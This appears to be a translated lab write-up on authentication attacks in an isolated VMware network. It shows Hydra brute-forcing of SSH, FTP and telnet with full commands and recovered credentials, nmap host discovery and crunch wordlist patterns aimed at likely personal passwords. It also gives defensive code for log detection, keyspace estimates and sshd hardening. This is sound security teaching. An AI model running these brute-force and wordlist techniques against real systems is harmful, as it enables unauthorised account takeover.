Lab preparation
Software: VMware Workstation Pro
Virtual machines: Kali Linux 2022, Metasploitable2-Linux, Red Hat Enterprise Linux 7 server
Network mode: NAT
The sshd and vsftpd services need to be deployed on the Red Hat server
Deploying the lab environment
Red Hat Enterprise Linux 7 server
[root@localhost 桌面]# ifconfig
eno16777736: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.13.131 netmask 255.255.255.0 broadcast 192.168.13.255
inet6 fe80::20c:29ff:feb8:5c2f prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:b8:5c:2f txqueuelen 1000 (Ethernet)
RX packets 1057 bytes 106442 (103.9 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 642 bytes 89679 (87.5 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 0 (Local Loopback)
RX packets 22 bytes 5210 (5.0 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 22 bytes 5210 (5.0 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
[root@localhost 桌面]# mkdir /mnt/cdrom
[root@localhost 桌面]# mount /dev/sr0 /mnt/cdrom/
mount: /dev/sr0 写保护,将以只读方式挂载
[root@localhost 桌面]# vim /etc/yum.repos.d/a.repo
[root@localhost 桌面]# cat /etc/yum.repos.d/a.repo
[a]
name=a
baseurl=file:///mnt/cdrom
enable=1
gpgcheck=0
[root@localhost 桌面]# yum repolist
已加载插件:langpacks, product-id, subscription-manager
This system is not registered to Red Hat Subscription Management. You can use subscription-manager to register.
a | 4.1 kB 00:00:00
(1/2): a/group_gz | 134 kB 00:00:00
(2/2): a/primary_db | 3.4 MB 00:00:00
源标识 源名称 状态
a a 4,305
repolist: 4,305
[root@localhost 桌面]# yum install vsftpd -y
[root@localhost 桌面]# systemctl start vsftpd
[root@localhost 桌面]# systemctl enable vsftpd
ln -s '/usr/lib/systemd/system/vsftpd.service' '/etc/systemd/system/multi-user.target.wants/vsftpd.service'
[root@localhost 桌面]# systemctl status vsftpd.service
vsftpd.service - Vsftpd ftp daemon
Loaded: loaded (/usr/lib/systemd/system/vsftpd.service; enabled)
Active: active (running) since 四 2024-05-23 09:12:12 CST; 9s ago
Main PID: 4730 (vsftpd)
CGroup: /system.slice/vsftpd.service
└─4730 /usr/sbin/vsftpd /etc/vsftpd/vsftpd.conf
5月 23 09:12:12 localhost.localdomain systemd[1]: Started Vsftpd ftp daemon.
[root@localhost 桌面]# systemctl status sshd.service
sshd.service - OpenSSH server daemon
Loaded: loaded (/usr/lib/systemd/system/sshd.service; enabled)
Active: active (running) since 四 2024-05-23 08:10:25 CST; 1h 2min ago
Main PID: 1734 (sshd)
CGroup: /system.slice/sshd.service
└─1734 /usr/sbin/sshd -D
[root@localhost 桌面]# systemctl list-unit-files | grep ftp
vsftpd.service enabled
vsftpd@.service disabled
vsftpd.target disabled
[root@localhost 桌面]# systemctl list-unit-files | grep ssh
anaconda-sshd.service static
sshd-keygen.service static
sshd.service enabled
sshd@.service static
sshd.socket disabled
[root@localhost 桌面]# ping 192.168.13.1 -c4
PING 192.168.13.1 (192.168.13.1) 56(84) bytes of data.
64 bytes from 192.168.13.1: icmp_seq=1 ttl=128 time=0.108 ms
64 bytes from 192.168.13.1: icmp_seq=2 ttl=128 time=0.118 ms
64 bytes from 192.168.13.1: icmp_seq=3 ttl=128 time=0.103 ms
64 bytes from 192.168.13.1: icmp_seq=4 ttl=128 time=0.112 ms
--- 192.168.13.1 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3002ms
rtt min/avg/max/mdev = 0.103/0.110/0.118/0.009 ms
Environment deployment complete.
Authentication attacks
Hydra
Kali Linux 2022
Hydra is an open-source online password brute-forcing tool from the well-known THC group. It is very capable, is installed by default on Kali, and supports online cracking of almost every protocol.
┌──(root㉿hnsw)-[~]
└─# hydra -h
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [-m MODULE_OPT] [service://server[:PORT][/OPT]]
Options:
-R restore a previous aborted/crashed session
-I ignore an existing restore file (don't wait 10 seconds)
-S perform an SSL connect
-s PORT if the service is on a different default port, define it here
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try password PASS, or load several passwords from FILE
-x MIN:MAX:CHARSET password bruteforce generation, type "-x -h" to get help
-y disable use of symbols in bruteforce, see above
-r use a non-random shuffling method for option -x
-e nsr try "n" null password, "s" login as pass and/or "r" reversed login
-u loop around users, not passwords (effective! implied with -x)
-C FILE colon separated "login:pass" format, instead of -L/-P options
-M FILE list of servers to attack, one entry per line, ':' to specify port
-o FILE write found login/password pairs to FILE instead of stdout
-b FORMAT specify the format for the -o FILE: text(default), json, jsonv1
-f / -F exit when a login/pass pair is found (-M: -f per host, -F global)
-t TASKS run TASKS number of connects in parallel per target (default: 16)
-T TASKS run TASKS connects in parallel overall (for -M, default: 64)
-w / -W TIME wait time for a response (32) / between connects per thread (0)
-c TIME wait time per login attempt over all threads (enforces -t 1)
-4 / -6 use IPv4 (default) / IPv6 addresses (put always in [] also in -M)
-v / -V / -d verbose mode / show login+pass for each attempt / debug mode
-O use old SSL v2 and v3
-K do not redo failed attempts (good for -M mass scanning)
-q do not print messages about connection errors
-U service module usage details
-m OPT options specific for a module, see -U output for information
-h more command line options (COMPLETE HELP)
server the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
service the service to crack (see below for supported protocols)
OPT some service modules support additional input (-U for module help)
Supported services: adam6500 asterisk cisco cisco-enable cobaltstrike cvs firebird ftp[s] http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] memcached mongodb mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp
Hydra is a tool to guess/crack valid login/password pairs.
Licensed under AGPL v3.0. The newest version is always available at;
https://github.com/vanhauser-thc/thc-hydra
Please don't use in military or secret service organizations, or for illegal
purposes. (This is a wish and non-binding - most such people do not care about
laws and ethics anyway - and tell themselves they are one of the good ones.)
These services were not compiled in: afp ncp oracle sapr3 smb2.
Use HYDRA_PROXY_HTTP or HYDRA_PROXY environment variables for a proxy setup.
E.g. % export HYDRA_PROXY=socks5://l:p@127.0.0.1:9150 (or: socks4:// connect://)
% export HYDRA_PROXY=connect_and_socks_proxylist.txt (up to 64 entries)
% export HYDRA_PROXY_HTTP=http://login:pass@proxy:8080
% export HYDRA_PROXY_HTTP=proxylist.txt (up to 64 entries)
Examples:
hydra -l user -P passlist.txt ftp://192.168.0.1
hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
hydra -l admin -p password ftp://[192.168.0.0/24]/
hydra -L logins.txt -P pws.txt -M targets.txt ssh
Usage
Syntax: hydra [options] IP service
Options:
-l login: lowercase; specify a single username to crack
-L file: uppercase; specify a username dictionary file
-p pass: lowercase; specify a single password; rarely used, a password dictionary is normally used instead.
-P file: uppercase; specify a password dictionary file.
-e ns: extra checks; n: try an empty password, s: try the login name as the password
-M file: specify a file listing target IPs, for batch cracking.
-o file: specify the file to write results to
-f: stop as soon as the first login/password pair is found.
-t tasks: number of connections to run in parallel, default 16
-w time: maximum wait time for a response, in seconds
-v / -V: show verbose progress
-R: resume cracking (if a run was interrupted, run hydra -R /path/to/hydra.restore next time to continue the task.)
-x: generate candidate passwords by rule instead of reading a dictionary.
Before testing, two dictionary files need to be created:
┌──(root㉿hnsw)-[/opt]
└─# cat username.txt
aaa
bbb
msfadmin
user
student
abc
┌──(root㉿hnsw)-[/opt]
└─# cat pws.txt
abcde
fdf
dfkdfk
redhat
dkdkk
msfadmin
Start the brute-force run with the following command:
┌──(root㉿hnsw)-[/opt]
└─# hydra 192.168.13.131 ssh -L username.txt -P pws.txt -t 2 -v -e ns
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-05-23 10:50:16
[DATA] max 2 tasks per 1 server, overall 2 tasks, 35 login tries (l:5/p:7), ~18 tries per task
[DATA] attacking ssh://192.168.13.131:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://aaa@192.168.13.131:22
[INFO] Successful, password authentication is supported by ssh://192.168.13.131:22
[22][ssh] host: 192.168.13.131 login: student password: redhat
[STATUS] attack finished for 192.168.13.131 (waiting for children to complete tests)
[STATUS] 35.00 tries/min, 35 tries in 00:01h, 1 to do in 00:01h, 1 active
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-05-23 10:51:45
The run recovered the user student with password redhat.
The command targets the SSH service on host 192.168.13.131, uses username.txt as the username dictionary and pws.txt as the password dictionary, runs 2 parallel tasks, shows verbose progress, and additionally tries an empty password and the login name as the password.
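What the hydra run above leaves behind on the target, seen from the defender's side: an added example (not part of the original lab) that parses /var/log/secure style sshd lines, flags a source that reaches a failure threshold within a time window, and flags any login accepted from that source afterwards. The log lines are constructed to mirror the run (192.168.13.129 is the Kali host from the nmap sweep; timestamps, PIDs and ports are invented).

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample of /var/log/secure on the RHEL 7 target during the hydra run
# (timestamps, PIDs and ports are invented; 192.168.13.129 is the Kali host).
SAMPLE_LOG = """\
May 23 10:50:17 localhost sshd[4821]: Failed password for invalid user aaa from 192.168.13.129 port 45210 ssh2
May 23 10:50:19 localhost sshd[4823]: Failed password for invalid user bbb from 192.168.13.129 port 45212 ssh2
May 23 10:50:21 localhost sshd[4825]: Failed password for invalid user msfadmin from 192.168.13.129 port 45214 ssh2
May 23 10:50:23 localhost sshd[4827]: Failed password for invalid user user from 192.168.13.129 port 45216 ssh2
May 23 10:50:25 localhost sshd[4829]: Failed password for student from 192.168.13.129 port 45218 ssh2
May 23 10:50:27 localhost sshd[4831]: Failed password for student from 192.168.13.129 port 45220 ssh2
May 23 10:51:40 localhost sshd[4902]: Accepted password for student from 192.168.13.129 port 45390 ssh2
May 23 10:52:05 localhost sshd[4950]: Accepted password for root from 192.168.13.132 port 50122 ssh2
"""

# sshd's auth result lines; "invalid user" appears only when the account does not exist.
LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+ ssh2$"
)


def detect_bruteforce(log_text, threshold=5, window_s=60):
    """Return alerts as (kind, ip, user, failures).

    'bruteforce' fires the first time a source reaches `threshold` failed
    passwords within `window_s` seconds; 'success_after_bruteforce' fires for
    every Accepted line from a source already flagged (a guessed credential in use).
    """
    recent = defaultdict(deque)  # ip -> timestamps of failures inside the window
    flagged = set()
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")  # syslog lines carry no year
        ip, user = m["ip"], m["user"]
        if m["result"] == "Failed":
            window = recent[ip]
            window.append(ts)
            while (ts - window[0]).total_seconds() > window_s:
                window.popleft()
            if len(window) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append(("bruteforce", ip, user, len(window)))
        elif ip in flagged:
            alerts.append(("success_after_bruteforce", ip, user, len(recent[ip])))
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(*alert)
```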
Start the Metasploitable2-Linux target machine.
Host discovery
┌──(root㉿hnsw)-[/opt]
└─# nmap -sn 192.168.13.0/24
Starting Nmap 7.93 ( https://nmap.org ) at 2024-05-23 10:57 CST
Nmap scan report for 192.168.13.1
Host is up (0.00013s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.13.2
Host is up (0.000076s latency).
MAC Address: 00:50:56:E9:9A:74 (VMware)
Nmap scan report for 192.168.13.130
Host is up (0.00011s latency).
MAC Address: 00:0C:29:8B:16:D6 (VMware)
Nmap scan report for 192.168.13.131
Host is up (0.000086s latency).
MAC Address: 00:0C:29:B8:5C:2F (VMware)
Nmap scan report for 192.168.13.132
Host is up (0.000077s latency).
MAC Address: 00:0C:29:DD:7C:41 (VMware)
Nmap scan report for 192.168.13.254
Host is up (0.000067s latency).
MAC Address: 00:50:56:F5:D4:6C (VMware)
Nmap scan report for 192.168.13.129
Host is up.
Nmap done: 256 IP addresses (7 hosts up) scanned in 20.99 seconds
Identify the operating systems of the live hosts; this confirms the target IP is 192.168.13.130
┌──(root㉿hnsw)-[/opt]
└─# nmap -O 192.168.13.130-132
Starting Nmap 7.93 ( https://nmap.org ) at 2024-05-23 10:58 CST
Nmap scan report for 192.168.13.130
Host is up (0.00069s latency).
Not shown: 977 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
53/tcp open domain
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
512/tcp open exec
513/tcp open login
514/tcp open shell
1099/tcp open rmiregistry
1524/tcp open ingreslock
2049/tcp open nfs
2121/tcp open ccproxy-ftp
3306/tcp open mysql
5432/tcp open postgresql
5900/tcp open vnc
6000/tcp open X11
6667/tcp open irc
8009/tcp open ajp13
8180/tcp open unknown
MAC Address: 00:0C:29:8B:16:D6 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Nmap scan report for 192.168.13.131
Host is up (0.00014s latency).
Not shown: 987 filtered tcp ports (no-response), 12 filtered tcp ports (host-prohibited)
PORT STATE SERVICE
22/tcp open ssh
MAC Address: 00:0C:29:B8:5C:2F (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10, Linux 2.6.32 - 3.13, Linux 3.4 - 3.10
Network Distance: 1 hop
Nmap scan report for 192.168.13.132
Host is up (0.00034s latency).
Not shown: 987 filtered tcp ports (no-response), 12 filtered tcp ports (host-prohibited)
PORT STATE SERVICE
22/tcp open ssh
MAC Address: 00:0C:29:DD:7C:41 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10, Linux 2.6.32 - 3.13, Linux 3.4 - 3.10
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 3 IP addresses (3 hosts up) scanned in 18.45 seconds
Brute-force the FTP and telnet services on the target.
┌──(root㉿hnsw)-[/opt]
└─# hydra 192.168.13.130 ftp -L username.txt -P pws.txt -t 2 -v -e ns
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-05-23 11:01:56
[DATA] max 2 tasks per 1 server, overall 2 tasks, 48 login tries (l:6/p:8), ~24 tries per task
[DATA] attacking ftp://192.168.13.130:21/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[21][ftp] host: 192.168.13.130 login: msfadmin password: msfadmin
[21][ftp] host: 192.168.13.130 login: user password: user
[STATUS] attack finished for 192.168.13.130 (waiting for children to complete tests)
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-05-23 11:02:51
┌──(root㉿hnsw)-[/opt]
└─# ftp 192.168.13.130
Connected to 192.168.13.130.
220 (vsFTPd 2.3.4)
Name (192.168.13.130:root): user
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> bye
221 Goodbye.
┌──(root㉿hnsw)-[/opt]
└─# ftp 192.168.13.130
Connected to 192.168.13.130.
220 (vsFTPd 2.3.4)
Name (192.168.13.130:root): msfadmin
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> exit
221 Goodbye.
The FTP brute-force recovered the usernames msfadmin and user with the passwords msfadmin and user.
Logging in with the recovered usernames and passwords succeeds.
┌──(root㉿hnsw)-[/opt]
└─# hydra 192.168.13.130 telnet -L username.txt -P pws.txt -t 2 -v -e ns
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-05-23 11:12:20
[WARNING] telnet is by its nature unreliable to analyze, if possible better choose FTP, SSH, etc. if available
[DATA] max 2 tasks per 1 server, overall 2 tasks, 48 login tries (l:6/p:8), ~24 tries per task
[DATA] attacking telnet://192.168.13.130:23/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[23][telnet] host: 192.168.13.130 login: msfadmin password: msfadmin
[23][telnet] host: 192.168.13.130 login: user password: user
[STATUS] 40.00 tries/min, 40 tries in 00:01h, 8 to do in 00:01h, 2 active
[STATUS] attack finished for 192.168.13.130 (waiting for children to complete tests)
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-05-23 11:13:38
The telnet brute-force gives the same result.
Dictionary files
It is not hard to see from the experiments above that whether usernames and passwords can be brute-forced at all depends heavily on the dictionary files username.txt and pws.txt.
In Kali, dictionaries come from three sources:
1. Generate the required dictionary with a dictionary-generation tool
2. Use the dictionaries shipped with the system
3. Download popular dictionaries from the Internet
crunch
crunch is a tool for creating password dictionaries: it generates candidates according to rules you specify, so a dictionary file can be tailored flexibly. The passwords crunch generates can be printed to the screen, saved to a file, or piped to another program.
Basic syntax
crunch <min> <max> [charset] [options]
min: minimum string length
max: maximum string length
-b: maximum size of each output file, to avoid one oversized dictionary
-c: number of lines (passwords) per output file
-d: limit the number of consecutive identical characters
-e: stop string; generation stops when this string is reached
-f: use a character set from a library file (/usr/share/crunch/charset.lst)
-i: invert the output order, i.e. aaa,aab -> aaa,baa
-l: used together with -t; marks which placeholder characters are to be taken literally
-m: usually combined with -p
-o: save the passwords to the specified file
-p: permute the given elements (words) rather than combining characters
-q: read a file of words to permute, e.g. pass.txt
-r: resume from a specified string, continuing an interrupted run
-s: specify a starting string, i.e. begin output from a password xxxx you define
-t: specify the output pattern
-u: suppress the percentage display (must be the last option)
-z: compress the generated dictionary; supports gzip, bzip2, lzma, 7z
Example one:
crunch 5 6
# generate strings of minimum length 5 and maximum length 6; with no charset given, the default is the 26 lowercase letters
Example two:
crunch 1 2 ab
# generate all combinations of length 1 to 2 built from the elements a and b
Example three:
crunch 1 2 ab -o a.txt
# as above, but save the generated strings to the file a.txt
Example four:
crunch 9 9 -t hnsw%%%%% -o b.txt
# generate strings made of the lowercase letters hnsw followed by five arbitrary digits, saved to the file b.txt
The -t option specifies the pattern of the full output string. It is followed by a mix of fixed characters and placeholder characters with special meaning; the placeholders are:
@ a lowercase letter
, an uppercase letter
% a digit
^ a special character
For users who like to use their name initials plus birthday as a password,
crunch 9 9 -t @@@%%%%% -o b.txt
produces a table covering every possibility.
Example five:
When a dictionary is very large and the size of each file must be limited, use the -b option:
crunch 10 10 -t hnsw%%%%%% -o START -b 1mb
# generate strings made of the lowercase letters hnsw plus six arbitrary digits, written to files of at most 1 MB each.
Example six:
When it is known that no two identical characters appear consecutively in the strings (for example a 5-character string made of two Chinese pinyin syllables, where pinyin does not have two identical letters in a row), the -d option limits how many times the same character may repeat; a value of 1 means no two consecutive identical characters. The command is
crunch 5 5 -t @@@@@ -o START -d 1
Example seven:
If we know the target well, for example we see that the QWERT and 1234 keys on someone's keyboard are badly worn, we can generate passwords from just those characters. The -c option additionally limits the number of strings (lines) per file. The command is
crunch 6 6 qwert1234 -o START -c 10000
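To put numbers on the examples above, here is an added helper (not part of the lab and not crunch's own code) that reproduces the -t placeholder rules from the option list: it counts the keyspace of a pattern, expands small patterns and charsets, applies a -d 1 style duplicate filter, and turns a keyspace into guessing time at an observed hydra rate. string.punctuation stands in for crunch's ^ symbol set, which is an assumption rather than crunch's exact list.

```python
import itertools
import string

# Placeholder classes of crunch -t as listed above; any other character is literal.
# string.punctuation stands in for crunch's ^ set (assumption, not crunch's exact list).
CLASSES = {
    "@": string.ascii_lowercase,
    ",": string.ascii_uppercase,
    "%": string.digits,
    "^": string.punctuation,
}


def keyspace(pattern):
    """Number of candidates a -t pattern expands to; a literal position counts once."""
    total = 1
    for ch in pattern:
        total *= len(CLASSES.get(ch, ch))
    return total


def expand(pattern):
    """Yield every string matching a -t pattern (only sensible for small keyspaces)."""
    pools = [CLASSES.get(ch, ch) for ch in pattern]
    for combo in itertools.product(*pools):
        yield "".join(combo)


def charset_words(minlen, maxlen, charset):
    """crunch <min> <max> <charset>: every string of length min..max, shortest first."""
    for n in range(minlen, maxlen + 1):
        for combo in itertools.product(charset, repeat=n):
            yield "".join(combo)


def within_run_limit(word, limit=1):
    """Filter equivalent to -d <limit>: reject words in which a character repeats
    more than `limit` times in a row (limit=1: no two identical neighbours)."""
    run = 1
    for prev, cur in zip(word, word[1:]):
        run = run + 1 if cur == prev else 1
        if run > limit:
            return False
    return True


def minutes_to_exhaust(pattern, tries_per_minute):
    """Worst-case online guessing time for a pattern at an observed hydra rate."""
    return keyspace(pattern) / tries_per_minute


if __name__ == "__main__":
    # initials + birthday pattern from example four vs. the 35 tries/min hydra reached above
    print(keyspace("@@@%%%%%"), "candidates")
    print(round(minutes_to_exhaust("@@@%%%%%", 35) / (60 * 24 * 365), 1), "years at 35 tries/min")
```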
[Figure: password cracking speed comparison chart]
The chart shows intuitively how a secure password should be chosen.
Besides choosing stronger passwords, limiting the maximum number of password attempts is another countermeasure.
For example, configure the SSH service on Red Hat to allow at most 3 password attempts.
[root@localhost home]# vim /etc/ssh/sshd_config
……
#LoginGraceTime 2m
PermitRootLogin yes
#StrictModes yes
MaxAuthTries 3
……
[root@localhost home]# systemctl restart sshd.service
Logging in remotely from another Red Hat clone, the connection is forcibly closed after three wrong passwords.
[root@localhost opt]# ssh 192.168.13.131
root@192.168.13.131's password:
Permission denied, please try again.
root@192.168.13.131's password:
Permission denied, please try again.
root@192.168.13.131's password:
Received disconnect from 192.168.13.131: 2: Too many authentication failures for root
When the Kali machine tries to brute-force again, it gets no result for a long time. Although the username and password can eventually be found, that is only because the username and password dictionaries are small; with ordinary-sized dictionaries the time grows geometrically. In addition, the SSH service supports key-based login, which is more secure than password authentication.
┌──(root㉿hnsw)-[/opt]
└─# hydra 192.168.13.131 ssh -L username.txt -P pws.txt -t 2 -v -e ns
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-05-23 11:37:38
[DATA] max 2 tasks per 1 server, overall 2 tasks, 48 login tries (l:6/p:8), ~24 tries per task
[DATA] attacking ssh://192.168.13.131:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://aaa@192.168.13.131:22
[INFO] Successful, password authentication is supported by ssh://192.168.13.131:22
[STATUS] 11.00 tries/min, 11 tries in 00:01h, 37 to do in 00:04h, 2 active
[STATUS] 8.00 tries/min, 16 tries in 00:02h, 32 to do in 00:05h, 2 active
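An added configuration check (example code, not from the lab) for the sshd_config settings this section edits: it resolves the effective values the way sshd does, first occurrence of a keyword wins, so a duplicate MaxAuthTries placed later in the file is ignored, and reports the values that still leave password guessing possible. The sample config is constructed from the excerpt above; the defaults table is assumed to follow sshd_config(5) for OpenSSH 7.x as shipped with RHEL 7.

```python
import re

# Constructed sshd_config excerpt mirroring the edit above (commented lines show sshd defaults).
SAMPLE_SSHD_CONFIG = """\
#LoginGraceTime 2m
PermitRootLogin yes
#StrictModes yes
MaxAuthTries 3
#PasswordAuthentication yes
"""

# Values sshd applies when a keyword is absent (OpenSSH 7.x defaults, as on RHEL 7; assumption).
DEFAULTS = {
    "maxauthtries": "6",
    "permitrootlogin": "prohibit-password",
    "passwordauthentication": "yes",
}


def effective_settings(config_text):
    """Resolve the keywords in DEFAULTS the way sshd does: for each keyword the
    first uncommented value wins, so a later duplicate is silently ignored.
    Parsing stops at the first Match block, whose settings are conditional."""
    seen = {}
    for raw in config_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)  # sshd accepts "Key value" or "Key=value"
        if len(parts) != 2:
            continue
        key, value = parts[0].lower(), parts[1].strip()
        if key == "match":
            break
        seen.setdefault(key, value)
    return {key: seen.get(key, default) for key, default in DEFAULTS.items()}


def audit(config_text):
    """Return findings that still leave the host open to the password guessing shown above."""
    s = effective_settings(config_text)
    findings = []
    if int(s["maxauthtries"]) > 3:
        findings.append(f"MaxAuthTries {s['maxauthtries']}: more than 3 guesses per connection")
    if s["permitrootlogin"] == "yes":
        findings.append("PermitRootLogin yes: root is a directly guessable account")
    if s["passwordauthentication"] != "no":
        findings.append("PasswordAuthentication on: dictionaries still apply; move to key-based login")
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_SSHD_CONFIG):
        print("WARN", finding)
```

MaxAuthTries only caps attempts per connection, which is why the run above slows to about 11 tries/min rather than stopping; a client that reconnects needs a source-based lockout (fail2ban or a firewall rate limit) on top of it, and ultimately PasswordAuthentication no with key-based logins.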